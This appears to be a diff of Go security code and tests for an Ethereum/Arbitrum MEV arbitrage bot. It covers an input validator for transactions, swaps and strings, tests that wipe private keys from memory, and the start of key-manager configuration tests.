			Pool:      common.HexToAddress("0x4444444444444444444444444444444444444444"),
		}
		result := validator.ValidateSwapParams(params)
		if result == nil {
			t.Error("ValidateSwapParams returned nil result")
		}
	})
}
// FuzzBatchSizeValidation tests batch size validation across operation
// types; non-positive sizes must never be reported valid.
func FuzzBatchSizeValidation(f *testing.F) {
	validator := NewInputValidator(42161)
	// Seed with known operation types
	operations := []string{"transaction", "swap", "arbitrage", "query", "unknown"}
	f.Fuzz(func(t *testing.T, size int, opIndex uint8) {
		defer func() {
			if r := recover(); r != nil {
				t.Errorf("BatchSize validation panicked: %v", r)
			}
		}()
		// Map the fuzzed index onto a known operation type.
		operation := operations[int(opIndex)%len(operations)]
		result := validator.ValidateBatchSize(size, operation)
		if result == nil {
			t.Error("ValidateBatchSize returned nil result")
		}
		// Negative sizes should always be invalid
		if size <= 0 && result.Valid {
			t.Errorf("Negative/zero batch size %d marked as valid for operation %s", size, operation)
		}
	})
}
// Removed FuzzABIValidation to avoid circular import - moved to pkg/arbitrum/abi_decoder_fuzz_test.go
// BenchmarkInputValidation benchmarks string validation and sanitization
// across short, medium and long inputs.
func BenchmarkInputValidation(b *testing.B) {
	validator := NewInputValidator(42161)
	// Test with various input sizes
	testInputs := []string{
		"short",
		strings.Repeat("medium_length_string_", 10),
		strings.Repeat("long_string_with_repeating_pattern_", 100),
	}
	for _, input := range testInputs {
		input := input
		// strconv.Itoa renders the length as digits; the previous
		// string(rune(len(input))) produced a single (often unprintable)
		// code point — e.g. "\x05" for length 5 — giving unreadable
		// benchmark names (the go vet string(int)-conversion pitfall).
		lenLabel := strconv.Itoa(len(input))
		b.Run("ValidateString_len_"+lenLabel, func(b *testing.B) {
			for i := 0; i < b.N; i++ {
				validator.ValidateString(input, "test", 10000)
			}
		})
		b.Run("SanitizeInput_len_"+lenLabel, func(b *testing.B) {
			for i := 0; i < b.N; i++ {
				validator.SanitizeInput(input)
			}
		})
	}
}

View File

@@ -0,0 +1,624 @@
package security
import (
"fmt"
"math/big"
"regexp"
"strings"
"time"
"github.com/ethereum/go-ethereum/common"
"github.com/ethereum/go-ethereum/core/types"
)
// InputValidator provides comprehensive input validation for all MEV bot
// operations: addresses, transactions, swap/arbitrage parameters, strings
// and batch sizes, against the limits fixed at construction time.
type InputValidator struct {
	safeMath    *SafeMath // overflow-safe numeric checks (gas price, value)
	maxGasLimit uint64    // hard upper bound on per-transaction gas
	maxGasPrice *big.Int  // hard upper bound on gas price (wei)
	chainID     uint64    // expected network; transactions on others are rejected
}

// ValidationResult contains the result of input validation.
// Errors imply Valid == false; Warnings are advisory and do not affect Valid.
type ValidationResult struct {
	Valid    bool     `json:"valid"`
	Errors   []string `json:"errors,omitempty"`
	Warnings []string `json:"warnings,omitempty"`
}

// TransactionParams represents transaction parameters for validation.
type TransactionParams struct {
	To       *common.Address `json:"to"` // nil for contract creation
	Value    *big.Int        `json:"value"`
	Data     []byte          `json:"data"`
	Gas      uint64          `json:"gas"`
	GasPrice *big.Int        `json:"gas_price"`
	Nonce    uint64          `json:"nonce"`
}

// SwapParams represents swap parameters for validation.
type SwapParams struct {
	TokenIn   common.Address `json:"token_in"`
	TokenOut  common.Address `json:"token_out"`
	AmountIn  *big.Int       `json:"amount_in"`
	AmountOut *big.Int       `json:"amount_out"`
	Slippage  uint64         `json:"slippage_bps"` // basis points
	Deadline  time.Time      `json:"deadline"`
	Recipient common.Address `json:"recipient"`
	Pool      common.Address `json:"pool"`
}

// ArbitrageParams represents arbitrage parameters for validation.
type ArbitrageParams struct {
	BuyPool     common.Address `json:"buy_pool"`
	SellPool    common.Address `json:"sell_pool"`
	Token       common.Address `json:"token"`
	AmountIn    *big.Int       `json:"amount_in"`
	MinProfit   *big.Int       `json:"min_profit"`
	MaxGasPrice *big.Int       `json:"max_gas_price"`
	Deadline    time.Time      `json:"deadline"`
}
// NewInputValidator creates a new input validator with security limits.
// chainID pins transactions to the expected network (e.g. 42161 for
// Arbitrum One); the gas limit and gas price caps are fixed here and
// enforced during transaction validation.
func NewInputValidator(chainID uint64) *InputValidator {
	return &InputValidator{
		safeMath:    NewSafeMath(),
		maxGasLimit: 15000000,                                             // 15M gas limit
		maxGasPrice: new(big.Int).Mul(big.NewInt(10000), big.NewInt(1e9)), // 10000 Gwei
		chainID:     chainID,
	}
}
// ValidateAddress validates an Ethereum address: it rejects the zero
// address and any denylisted address, and attaches a warning (not an
// error) for vanity patterns ("dead"/"beef") commonly seen in burn or
// bait addresses.
func (iv *InputValidator) ValidateAddress(addr common.Address) *ValidationResult {
	result := &ValidationResult{Valid: true}

	// Check for zero address.
	if addr == (common.Address{}) {
		result.Valid = false
		result.Errors = append(result.Errors, "address cannot be zero address")
		return result
	}

	// Denylist of known malicious addresses (extend this list as needed).
	// The zero address entry was removed: it was unreachable because the
	// explicit check above already returns for it.
	maliciousAddresses := []common.Address{}
	for _, malicious := range maliciousAddresses {
		if addr == malicious {
			result.Valid = false
			result.Errors = append(result.Errors, "address is flagged as malicious")
			return result
		}
	}

	// Check for suspicious patterns (lowercase once instead of per check).
	lowerAddr := strings.ToLower(addr.Hex())
	if strings.Contains(lowerAddr, "dead") || strings.Contains(lowerAddr, "beef") {
		result.Warnings = append(result.Warnings, "address contains suspicious patterns")
	}
	return result
}
// ValidateTransaction validates a complete transaction: chain ID, gas
// limit/price bounds, value range, recipient address, and calldata patterns.
// Entries in Errors mark the transaction invalid; Warnings are advisory.
func (iv *InputValidator) ValidateTransaction(tx *types.Transaction) *ValidationResult {
	result := &ValidationResult{Valid: true}

	// Reject transactions built for a different chain.
	if chainID := tx.ChainId().Uint64(); chainID != iv.chainID {
		result.Valid = false
		result.Errors = append(result.Errors, fmt.Sprintf("invalid chain ID: expected %d, got %d", iv.chainID, chainID))
	}

	// Gas limit must fall within [21000, maxGasLimit].
	gas := tx.Gas()
	if gas > iv.maxGasLimit {
		result.Valid = false
		result.Errors = append(result.Errors, fmt.Sprintf("gas limit %d exceeds maximum %d", gas, iv.maxGasLimit))
	}
	if gas < 21000 {
		result.Valid = false
		result.Errors = append(result.Errors, "gas limit below minimum 21000")
	}

	// Gas price and value go through the shared safe-math range checks.
	if gasPrice := tx.GasPrice(); gasPrice != nil {
		if err := iv.safeMath.ValidateGasPrice(gasPrice); err != nil {
			result.Valid = false
			result.Errors = append(result.Errors, fmt.Sprintf("invalid gas price: %v", err))
		}
	}
	if value := tx.Value(); value != nil {
		if err := iv.safeMath.ValidateTransactionValue(value); err != nil {
			result.Valid = false
			result.Errors = append(result.Errors, fmt.Sprintf("invalid transaction value: %v", err))
		}
	}

	// Recipient may be nil (contract creation); validate only when present.
	if to := tx.To(); to != nil {
		addrResult := iv.ValidateAddress(*to)
		if !addrResult.Valid {
			result.Valid = false
			result.Errors = append(result.Errors, "invalid recipient address")
			result.Errors = append(result.Errors, addrResult.Errors...)
		}
		result.Warnings = append(result.Warnings, addrResult.Warnings...)
	}

	// Scan non-empty calldata for suspicious patterns.
	if payload := tx.Data(); len(payload) > 0 {
		dataResult := iv.validateTransactionData(payload)
		if !dataResult.Valid {
			result.Valid = false
			result.Errors = append(result.Errors, dataResult.Errors...)
		}
		result.Warnings = append(result.Warnings, dataResult.Warnings...)
	}

	return result
}
// ValidateSwapParams validates swap parameters: address validity, token
// distinctness, positive amounts, slippage bounds (basis points), and
// deadline sanity. Errors invalidate the swap; warnings are advisory.
func (iv *InputValidator) ValidateSwapParams(params *SwapParams) *ValidationResult {
	result := &ValidationResult{Valid: true}
	addError := func(msg string) {
		result.Valid = false
		result.Errors = append(result.Errors, msg)
	}

	// Every address involved in the swap must pass address validation.
	for _, addr := range []common.Address{params.TokenIn, params.TokenOut, params.Recipient, params.Pool} {
		addrResult := iv.ValidateAddress(addr)
		if !addrResult.Valid {
			result.Valid = false
			result.Errors = append(result.Errors, addrResult.Errors...)
		}
		result.Warnings = append(result.Warnings, addrResult.Warnings...)
	}

	// A swap between identical tokens is meaningless.
	if params.TokenIn == params.TokenOut {
		addError("token in and token out cannot be the same")
	}

	// Both amounts must be present and strictly positive.
	if params.AmountIn == nil || params.AmountIn.Sign() <= 0 {
		addError("amount in must be positive")
	}
	if params.AmountOut == nil || params.AmountOut.Sign() <= 0 {
		addError("amount out must be positive")
	}

	// Slippage is in basis points: hard cap at 100%, warn above 5%.
	if params.Slippage > 10000 {
		addError("slippage cannot exceed 100%")
	}
	if params.Slippage > 500 {
		result.Warnings = append(result.Warnings, "slippage above 5% detected")
	}

	// Past deadlines are fatal; far-future deadlines are merely suspicious.
	if params.Deadline.Before(time.Now()) {
		addError("deadline is in the past")
	}
	if params.Deadline.After(time.Now().Add(1 * time.Hour)) {
		result.Warnings = append(result.Warnings, "deadline is more than 1 hour in the future")
	}

	return result
}
// ValidateArbitrageParams validates arbitrage parameters: pool/token
// addresses, pool distinctness, positive amounts, optional gas-price cap,
// deadline, and a rough profitability sanity check.
func (iv *InputValidator) ValidateArbitrageParams(params *ArbitrageParams) *ValidationResult {
	result := &ValidationResult{Valid: true}
	// Validate all addresses involved in the route.
	for _, addr := range []common.Address{params.BuyPool, params.SellPool, params.Token} {
		addrResult := iv.ValidateAddress(addr)
		if !addrResult.Valid {
			result.Valid = false
			result.Errors = append(result.Errors, addrResult.Errors...)
		}
		result.Warnings = append(result.Warnings, addrResult.Warnings...)
	}
	// Buying and selling on the same pool cannot be an arbitrage.
	if params.BuyPool == params.SellPool {
		result.Valid = false
		result.Errors = append(result.Errors, "buy pool and sell pool cannot be the same")
	}
	// Amounts must be present and strictly positive.
	if params.AmountIn == nil || params.AmountIn.Sign() <= 0 {
		result.Valid = false
		result.Errors = append(result.Errors, "amount in must be positive")
	}
	if params.MinProfit == nil || params.MinProfit.Sign() <= 0 {
		result.Valid = false
		result.Errors = append(result.Errors, "minimum profit must be positive")
	}
	// A gas-price cap is optional but must be in range when provided.
	if params.MaxGasPrice != nil {
		if err := iv.safeMath.ValidateGasPrice(params.MaxGasPrice); err != nil {
			result.Valid = false
			result.Errors = append(result.Errors, fmt.Sprintf("invalid max gas price: %v", err))
		}
	}
	// Deadline must not already have passed.
	if params.Deadline.Before(time.Now()) {
		result.Valid = false
		result.Errors = append(result.Errors, "deadline is in the past")
	}
	// Check if arbitrage is potentially profitable: warn when the requested
	// minimum profit is below 0.1% of the input amount.
	// BUG FIX: the SafePercent failure value was previously discarded, so a
	// failed computation could leave a nil threshold and Cmp would panic.
	// The check is now skipped when the threshold cannot be computed.
	if params.AmountIn != nil && params.MinProfit != nil {
		minProfitThreshold, _ := iv.safeMath.SafePercent(params.AmountIn, 10) // 0.1%
		if minProfitThreshold != nil && params.MinProfit.Cmp(minProfitThreshold) < 0 {
			result.Warnings = append(result.Warnings, "minimum profit threshold is very low")
		}
	}
	return result
}
// validateTransactionData validates transaction calldata for suspicious
// patterns: oversized payloads, embedded burn-address bytes, and known risky
// 4-byte function selectors.
func (iv *InputValidator) validateTransactionData(data []byte) *ValidationResult {
	result := &ValidationResult{Valid: true}

	// Cap calldata at 100KB to bound downstream processing.
	if len(data) > 100000 {
		result.Valid = false
		result.Errors = append(result.Errors, "transaction data exceeds size limit")
		return result
	}

	// Convert to hex string for pattern matching.
	dataHex := common.Bytes2Hex(data)

	// BUG FIX: the previous version also searched the hex string for the
	// ASCII words "selfdestruct", "delegatecall" and "create2". A hex string
	// contains only [0-9a-f], so those patterns could never match and the
	// checks (including the "critical" selfdestruct rejection) were dead
	// code; they have been removed. Detecting those operations reliably
	// would require EVM bytecode analysis, not substring matching.
	//
	// The burn-address pattern (0xff followed by 19 zero bytes) is made of
	// hex characters and remains meaningful.
	burnPattern := "ff" + strings.Repeat("00", 19)
	if strings.Contains(strings.ToLower(dataHex), burnPattern) {
		result.Warnings = append(result.Warnings, "transaction contains potential burn address")
	}

	// Warn on known function selectors of risky operations.
	if len(data) >= 4 {
		selector := common.Bytes2Hex(data[:4])
		riskySelectors := map[string]string{
			"ff6cae96": "selfdestruct function",
			"9dc29fac": "burn function",
			"42966c68": "burn function (alternative)",
		}
		if message, exists := riskySelectors[selector]; exists {
			result.Warnings = append(result.Warnings, "transaction calls "+message)
		}
	}

	return result
}
// validateStringCtrlRe matches C0/C1 control characters. Compiled once at
// package scope so ValidateString does not pay regexp.MustCompile per call.
var validateStringCtrlRe = regexp.MustCompile(`[\x00-\x1f\x7f-\x9f]`)

// ValidateString validates string inputs for injection attacks: length
// budget, null bytes, control characters, and common SQL/script patterns.
// Injection patterns produce warnings only, since legitimate values may
// contain SQL keywords.
func (iv *InputValidator) ValidateString(input, fieldName string, maxLength int) *ValidationResult {
	result := &ValidationResult{Valid: true}

	// Enforce the caller-supplied length budget.
	if len(input) > maxLength {
		result.Valid = false
		result.Errors = append(result.Errors, fmt.Sprintf("%s exceeds maximum length %d", fieldName, maxLength))
	}

	// Null bytes are never legitimate in textual input.
	if strings.Contains(input, "\x00") {
		result.Valid = false
		result.Errors = append(result.Errors, fmt.Sprintf("%s contains null bytes", fieldName))
	}

	// Reject other control characters as well.
	// PERF FIX: the pattern used to be compiled on every call; it is now a
	// package-level variable compiled once.
	if validateStringCtrlRe.MatchString(input) {
		result.Valid = false
		result.Errors = append(result.Errors, fmt.Sprintf("%s contains control characters", fieldName))
	}

	// Warn (do not reject) on substrings often seen in SQL/script injection.
	sqlPatterns := []string{
		"'", "\"", "--", "/*", "*/", "xp_", "sp_", "exec", "execute",
		"select", "insert", "update", "delete", "drop", "create", "alter",
		"union", "join", "script", "javascript",
	}
	lowerInput := strings.ToLower(input)
	for _, pattern := range sqlPatterns {
		if strings.Contains(lowerInput, pattern) {
			result.Warnings = append(result.Warnings, fmt.Sprintf("%s contains potentially dangerous pattern: %s", fieldName, pattern))
		}
	}

	return result
}
// numericStringRe matches unsigned decimal numbers with an optional
// fractional part. Compiled once at package scope so ValidateNumericString
// does not pay regexp.MustCompile per call.
var numericStringRe = regexp.MustCompile(`^[0-9]+(\.[0-9]+)?$`)

// ValidateNumericString validates that a string is a plain unsigned decimal
// number, warning on leading zeros and excessive (>18) decimal places.
func (iv *InputValidator) ValidateNumericString(input, fieldName string) *ValidationResult {
	result := &ValidationResult{Valid: true}

	// PERF FIX: the pattern used to be compiled on every call; it is now a
	// package-level variable compiled once.
	if !numericStringRe.MatchString(input) {
		result.Valid = false
		result.Errors = append(result.Errors, fmt.Sprintf("%s must be numeric", fieldName))
		return result
	}

	// "007"-style values (leading zero not followed by a decimal point)
	// usually indicate a formatting mistake upstream.
	if len(input) > 1 && input[0] == '0' && input[1] != '.' {
		result.Warnings = append(result.Warnings, fmt.Sprintf("%s has leading zeros", fieldName))
	}

	// More than 18 decimal places exceeds typical token precision.
	if strings.Contains(input, ".") {
		parts := strings.Split(input, ".")
		if len(parts[1]) > 18 {
			result.Warnings = append(result.Warnings, fmt.Sprintf("%s has excessive decimal places", fieldName))
		}
	}

	return result
}
// ValidateBatchSize validates batch operation sizes against per-operation
// limits, warning when a batch exceeds half of its allowed maximum.
func (iv *InputValidator) ValidateBatchSize(size int, operation string) *ValidationResult {
	result := &ValidationResult{Valid: true}

	// Per-operation ceilings; unknown operations fall back to 50.
	limit := 50
	switch operation {
	case "transaction":
		limit = 100
	case "swap":
		limit = 50
	case "arbitrage":
		limit = 20
	case "query":
		limit = 1000
	}

	if size <= 0 {
		result.Valid = false
		result.Errors = append(result.Errors, "batch size must be positive")
	}
	if size > limit {
		result.Valid = false
		result.Errors = append(result.Errors, fmt.Sprintf("batch size %d exceeds maximum %d for %s operations", size, limit, operation))
	}
	// Flag batches above half the limit even when they are still legal.
	if size > limit/2 {
		result.Warnings = append(result.Warnings, fmt.Sprintf("large batch size %d for %s operations", size, operation))
	}

	return result
}
// sanitizeCtrlRe matches control characters other than tab (\x09), LF
// (\x0a) and CR (\x0d). Compiled once at package scope so SanitizeInput
// does not pay regexp.MustCompile per call.
var sanitizeCtrlRe = regexp.MustCompile(`[\x00-\x08\x0b\x0c\x0e-\x1f\x7f-\x9f]`)

// SanitizeInput sanitizes string input by removing null bytes and control
// characters (keeping tab, newline and carriage return) and trimming
// surrounding whitespace.
func (iv *InputValidator) SanitizeInput(input string) string {
	// Remove null bytes first, then the remaining control characters.
	// PERF FIX: the pattern used to be compiled on every call; it is now a
	// package-level variable compiled once.
	input = strings.ReplaceAll(input, "\x00", "")
	input = sanitizeCtrlRe.ReplaceAllString(input, "")
	return strings.TrimSpace(input)
}
// ValidateExternalData performs comprehensive validation for data from external sources.
// It enforces a caller-supplied size cap and flags byte patterns that
// commonly indicate malformed or padded payloads. Errors invalidate the
// result; warnings are advisory only.
func (iv *InputValidator) ValidateExternalData(data []byte, source string, maxSize int) *ValidationResult {
	result := &ValidationResult{Valid: true}
	// Comprehensive bounds checking: nil is distinct from empty and rejected.
	if data == nil {
		result.Valid = false
		result.Errors = append(result.Errors, "external data cannot be nil")
		return result
	}
	// Check size limits against the per-source budget supplied by the caller.
	if len(data) > maxSize {
		result.Valid = false
		result.Errors = append(result.Errors, fmt.Sprintf("external data size %d exceeds maximum %d for source %s", len(data), maxSize, source))
		return result
	}
	// Check for obviously malformed data patterns (heuristics, warnings only).
	if len(data) > 0 {
		// Check for all-zero data (suspicious): warn only above 32 bytes so
		// small legitimately-zero values are not flagged.
		allZero := true
		for _, b := range data {
			if b != 0 {
				allZero = false
				break
			}
		}
		if allZero && len(data) > 32 {
			result.Warnings = append(result.Warnings, "external data appears to be all zeros")
		}
		// Check for repetitive patterns that might indicate malformed data:
		// every subsequent aligned 4-byte word is compared against the first
		// word. A trailing partial word is ignored; any mismatch stops the
		// scan early.
		if len(data) >= 4 {
			pattern := data[:4]
			repetitive := true
			for i := 4; i < len(data) && i < 1000; i += 4 { // Check first 1KB for performance
				if i+4 <= len(data) {
					for j := 0; j < 4; j++ {
						if data[i+j] != pattern[j] {
							repetitive = false
							break
						}
					}
					if !repetitive {
						break
					}
				}
			}
			// Only warn for payloads large enough (>64 bytes) that pure
			// repetition is unlikely to be legitimate.
			if repetitive && len(data) > 64 {
				result.Warnings = append(result.Warnings, "external data contains highly repetitive patterns")
			}
		}
	}
	return result
}
// ValidateArrayBounds validates array access bounds to prevent buffer
// overflows. The first failed check determines the reported error.
func (iv *InputValidator) ValidateArrayBounds(arrayLen, index int, operation string) *ValidationResult {
	// Maximum reasonable array size (prevents resource-exhaustion DoS).
	const maxArraySize = 100000

	result := &ValidationResult{Valid: true}
	fail := func(msg string) *ValidationResult {
		result.Valid = false
		result.Errors = append(result.Errors, msg)
		return result
	}

	switch {
	case arrayLen < 0:
		return fail(fmt.Sprintf("negative array length %d in operation %s", arrayLen, operation))
	case index < 0:
		return fail(fmt.Sprintf("negative array index %d in operation %s", index, operation))
	case index >= arrayLen:
		return fail(fmt.Sprintf("array index %d exceeds length %d in operation %s", index, arrayLen, operation))
	case arrayLen > maxArraySize:
		return fail(fmt.Sprintf("array length %d exceeds maximum %d in operation %s", arrayLen, maxArraySize, operation))
	}

	return result
}
// ValidateBufferAccess validates buffer access operations: non-negative
// parameters, no integer overflow in offset+length, and the access window
// fitting within the buffer.
func (iv *InputValidator) ValidateBufferAccess(bufferSize, offset, length int, operation string) *ValidationResult {
	result := &ValidationResult{Valid: true}
	fail := func(msg string) *ValidationResult {
		result.Valid = false
		result.Errors = append(result.Errors, msg)
		return result
	}

	if bufferSize < 0 {
		return fail(fmt.Sprintf("negative buffer size %d in operation %s", bufferSize, operation))
	}
	if offset < 0 {
		return fail(fmt.Sprintf("negative buffer offset %d in operation %s", offset, operation))
	}
	if length < 0 {
		return fail(fmt.Sprintf("negative buffer length %d in operation %s", length, operation))
	}

	// BUG FIX: overflow must be ruled out BEFORE computing offset+length in
	// int. The previous version compared offset+length against bufferSize
	// first, so on overflow that comparison ran on a wrapped (negative) sum
	// and the range check silently passed before the later overflow check
	// caught it. The uint64 sum of two non-negative ints cannot itself
	// overflow, so this check is exact.
	if uint64(offset)+uint64(length) > uint64(^uint(0)>>1) { // exceeds max int
		return fail(fmt.Sprintf("integer overflow in buffer access calculation: offset %d + length %d in operation %s", offset, length, operation))
	}

	if offset+length > bufferSize {
		return fail(fmt.Sprintf("buffer access [%d:%d] exceeds buffer size %d in operation %s", offset, offset+length, bufferSize, operation))
	}

	return result
}
// ValidateMemoryAllocation validates memory allocation requests against
// per-purpose size limits, warning on unusually large (but legal) requests
// and on zero-byte allocations.
func (iv *InputValidator) ValidateMemoryAllocation(size int, purpose string) *ValidationResult {
	result := &ValidationResult{Valid: true}

	if size < 0 {
		result.Valid = false
		result.Errors = append(result.Errors, fmt.Sprintf("negative memory allocation size %d for purpose %s", size, purpose))
		return result
	}
	if size == 0 {
		// Zero-byte allocations are legal but usually indicate a logic slip.
		result.Warnings = append(result.Warnings, fmt.Sprintf("zero memory allocation for purpose %s", purpose))
		return result
	}

	// Per-purpose ceilings; unknown purposes use the default budget.
	limit := 256 * 1024 // default
	switch purpose {
	case "transaction_data":
		limit = 1024 * 1024 // 1MB
	case "abi_decoding":
		limit = 512 * 1024 // 512KB
	case "log_message":
		limit = 64 * 1024 // 64KB
	case "swap_params":
		limit = 4 * 1024 // 4KB
	case "address_list":
		limit = 100 * 1024 // 100KB
	}

	if size > limit {
		result.Valid = false
		result.Errors = append(result.Errors, fmt.Sprintf("memory allocation size %d exceeds limit %d for purpose %s", size, limit, purpose))
		return result
	}
	// Flag allocations above half the budget even when they are legal.
	if size > limit/2 {
		result.Warnings = append(result.Warnings, fmt.Sprintf("large memory allocation %d for purpose %s", size, purpose))
	}

	return result
}

File diff suppressed because it is too large Load Diff

View File

@@ -0,0 +1,244 @@
package security
import (
"crypto/ecdsa"
"crypto/rand"
"math/big"
"testing"
"github.com/ethereum/go-ethereum/crypto"
"github.com/stretchr/testify/assert"
"github.com/stretchr/testify/require"
)
// TestEnhancedClearPrivateKey verifies that clearPrivateKey wipes all key
// material and that the key held real data beforehand.
func TestEnhancedClearPrivateKey(t *testing.T) {
	priv, err := ecdsa.GenerateKey(crypto.S256(), rand.Reader)
	require.NoError(t, err)
	require.NotNil(t, priv)
	require.NotNil(t, priv.D)

	// Snapshot the scalar and public point before wiping.
	savedD := new(big.Int).Set(priv.D)
	savedX := new(big.Int).Set(priv.PublicKey.X)
	savedY := new(big.Int).Set(priv.PublicKey.Y)

	// Sanity: the freshly generated key must be non-trivial.
	assert.True(t, priv.D.Sign() != 0)
	assert.True(t, priv.PublicKey.X.Sign() != 0)
	assert.True(t, priv.PublicKey.Y.Sign() != 0)

	clearPrivateKey(priv)

	// All components must be nil once cleared.
	assert.Nil(t, priv.D, "D should be nil after clearing")
	assert.Nil(t, priv.PublicKey.X, "X should be nil after clearing")
	assert.Nil(t, priv.PublicKey.Y, "Y should be nil after clearing")
	assert.Nil(t, priv.PublicKey.Curve, "Curve should be nil after clearing")

	// The snapshots prove the cleared values were originally non-zero.
	assert.True(t, savedD.Sign() != 0, "Original D should have been non-zero")
	assert.True(t, savedX.Sign() != 0, "Original X should have been non-zero")
	assert.True(t, savedY.Sign() != 0, "Original Y should have been non-zero")
}
// TestClearPrivateKeyNil verifies that clearing a nil key is a safe no-op.
func TestClearPrivateKeyNil(t *testing.T) {
	// Must not panic when handed nil.
	clearPrivateKey(nil)
}
// TestClearPrivateKeyPartiallyNil verifies clearing keys whose components
// are only partially populated.
func TestClearPrivateKeyPartiallyNil(t *testing.T) {
	partial := &ecdsa.PrivateKey{}

	// Fully nil components must not cause a panic.
	clearPrivateKey(partial)

	// A key with only the scalar set is still cleared correctly.
	partial.D = big.NewInt(12345)
	clearPrivateKey(partial)
	assert.Nil(t, partial.D)
}
// TestSecureClearBigInt verifies secureClearBigInt zeroes big.Int values of
// various signs and magnitudes.
func TestSecureClearBigInt(t *testing.T) {
	cases := []struct {
		name  string
		value *big.Int
	}{
		{name: "small positive value", value: big.NewInt(12345)},
		{name: "large positive value", value: new(big.Int).SetBytes([]byte{0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF})},
		{name: "negative value", value: big.NewInt(-9876543210)},
		{name: "zero value", value: big.NewInt(0)},
	}
	for _, tc := range cases {
		t.Run(tc.name, func(t *testing.T) {
			// Snapshot so we can prove the input was non-trivial.
			before := new(big.Int).Set(tc.value)

			secureClearBigInt(tc.value)

			// The value must compare equal to zero after clearing.
			assert.True(t, tc.value.Sign() == 0, "big.Int should be zero after clearing")
			assert.Equal(t, 0, tc.value.Cmp(big.NewInt(0)), "big.Int should equal zero")

			// All inputs except the explicit zero case started non-zero.
			if tc.name != "zero value" {
				assert.True(t, before.Sign() != 0, "Original value should have been non-zero")
			}
		})
	}
}
// TestSecureClearBigIntNil verifies that clearing a nil big.Int is a safe
// no-op.
func TestSecureClearBigIntNil(t *testing.T) {
	// Must not panic when handed nil.
	secureClearBigInt(nil)
}
// TestSecureClearBytes verifies secureClearBytes zeroes byte slices of
// different sizes, including the empty slice.
func TestSecureClearBytes(t *testing.T) {
	cases := []struct {
		name string
		data []byte
	}{
		{name: "small byte slice", data: []byte{0x01, 0x02, 0x03, 0x04}},
		{name: "large byte slice", data: make([]byte, 1024)},
		{name: "empty byte slice", data: []byte{}},
	}
	for _, tc := range cases {
		t.Run(tc.name, func(t *testing.T) {
			// Large slices start zeroed by make; fill them with a pattern.
			if len(tc.data) > 4 {
				for i := range tc.data {
					tc.data[i] = byte(i % 256)
				}
			}

			// Snapshot the pre-clear contents.
			before := make([]byte, len(tc.data))
			copy(before, tc.data)

			secureClearBytes(tc.data)

			// Every byte must be zero afterwards.
			for i, b := range tc.data {
				assert.Equal(t, byte(0), b, "Byte at index %d should be zero", i)
			}

			// For the small fixed slice, prove the input held real data.
			if len(before) > 0 && len(before) <= 4 {
				hasNonZero := false
				for _, b := range before {
					if b != 0 {
						hasNonZero = true
						break
					}
				}
				if len(before) > 0 && tc.name != "empty byte slice" {
					assert.True(t, hasNonZero, "Original data should have had non-zero bytes")
				}
			}
		})
	}
}
// TestMemorySecurityIntegration exercises the full lifecycle: generate a
// batch of keys, confirm they hold real material, then clear and verify
// each one.
func TestMemorySecurityIntegration(t *testing.T) {
	keys := make([]*ecdsa.PrivateKey, 10)
	for i := range keys {
		k, err := ecdsa.GenerateKey(crypto.S256(), rand.Reader)
		require.NoError(t, err)
		keys[i] = k
	}

	// Every generated key must carry a non-zero scalar.
	for i, k := range keys {
		assert.NotNil(t, k.D, "Key %d D should not be nil", i)
		assert.True(t, k.D.Sign() != 0, "Key %d D should not be zero", i)
	}

	// Clear each key and confirm all components are wiped.
	for i, k := range keys {
		clearPrivateKey(k)
		assert.Nil(t, k.D, "Key %d D should be nil after clearing", i)
		assert.Nil(t, k.PublicKey.X, "Key %d X should be nil after clearing", i)
		assert.Nil(t, k.PublicKey.Y, "Key %d Y should be nil after clearing", i)
	}
}
// TestConcurrentKeyClearingOperation verifies clearPrivateKey is safe when
// multiple workers clear distinct keys concurrently.
func TestConcurrentKeyClearingOperation(t *testing.T) {
	const (
		numKeys    = 50
		numWorkers = 10
	)

	keys := make([]*ecdsa.PrivateKey, numKeys)
	for i := range keys {
		k, err := ecdsa.GenerateKey(crypto.S256(), rand.Reader)
		require.NoError(t, err)
		keys[i] = k
	}

	// Feed every key through a buffered channel, then close it so workers
	// drain until exhaustion.
	work := make(chan *ecdsa.PrivateKey, numKeys)
	for _, k := range keys {
		work <- k
	}
	close(work)

	// Each worker clears keys and signals completion on finished.
	finished := make(chan bool, numWorkers)
	for w := 0; w < numWorkers; w++ {
		go func() {
			defer func() { finished <- true }()
			for k := range work {
				clearPrivateKey(k)
			}
		}()
	}
	for w := 0; w < numWorkers; w++ {
		<-finished
	}

	// Every key must be fully wiped regardless of which worker handled it.
	for i, k := range keys {
		assert.Nil(t, k.D, "Key %d D should be nil after concurrent clearing", i)
		assert.Nil(t, k.PublicKey.X, "Key %d X should be nil after concurrent clearing", i)
		assert.Nil(t, k.PublicKey.Y, "Key %d Y should be nil after concurrent clearing", i)
	}
}

View File

@@ -0,0 +1,829 @@
package security
import (
"crypto/ecdsa"
"math/big"
"testing"
"time"
"github.com/ethereum/go-ethereum/common"
"github.com/ethereum/go-ethereum/core/types"
"github.com/ethereum/go-ethereum/crypto"
"github.com/stretchr/testify/assert"
"github.com/stretchr/testify/require"
"github.com/fraktal/mev-beta/internal/logger"
)
// TestNewKeyManager tests the creation of a new KeyManager
func TestNewKeyManager(t *testing.T) {
// Test with valid configuration
config := &KeyManagerConfig{
KeystorePath: "/tmp/test_keystore",
EncryptionKey: "test_encryption_key_very_long_and_secure_for_testing",
}
log := logger.New("info", "text", "")
km, err := newKeyManagerForTesting(config, log)
require.NoError(t, err)
assert.NotNil(t, km)
assert.NotNil(t, km.keystore)
assert.NotNil(t, km.keys)
assert.NotNil(t, km.encryptionKey)
assert.Equal(t, config, km.config)
// Test with nil configuration (should use defaults with test encryption key)
defaultConfig := &KeyManagerConfig{
KeystorePath: "/tmp/test_default_keystore",
EncryptionKey: "default_test_encryption_key_very_long_and_secure_32chars",
}
km2, err := newKeyManagerForTesting(defaultConfig, log)
require.NoError(t, err)
assert.NotNil(t, km2)
assert.NotNil(t, km2.config)
assert.NotEmpty(t, km2.config.KeystorePath)
}
// TestNewKeyManagerInvalidConfig tests the rejection paths of KeyManager
// creation: empty key, short key, and empty keystore path.
func TestNewKeyManagerInvalidConfig(t *testing.T) {
	log := logger.New("info", "text", "")

	cases := []struct {
		name    string
		cfg     *KeyManagerConfig
		wantErr string
	}{
		{
			name: "empty encryption key",
			cfg: &KeyManagerConfig{
				KeystorePath:  "/tmp/test_keystore",
				EncryptionKey: "",
			},
			wantErr: "encryption key cannot be empty",
		},
		{
			name: "short encryption key",
			cfg: &KeyManagerConfig{
				KeystorePath:  "/tmp/test_keystore",
				EncryptionKey: "short",
			},
